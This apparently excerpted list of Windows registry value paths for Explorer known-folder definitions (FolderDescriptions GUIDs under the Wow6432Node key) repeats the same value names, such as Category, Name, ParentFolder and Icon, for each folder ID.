HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\Description
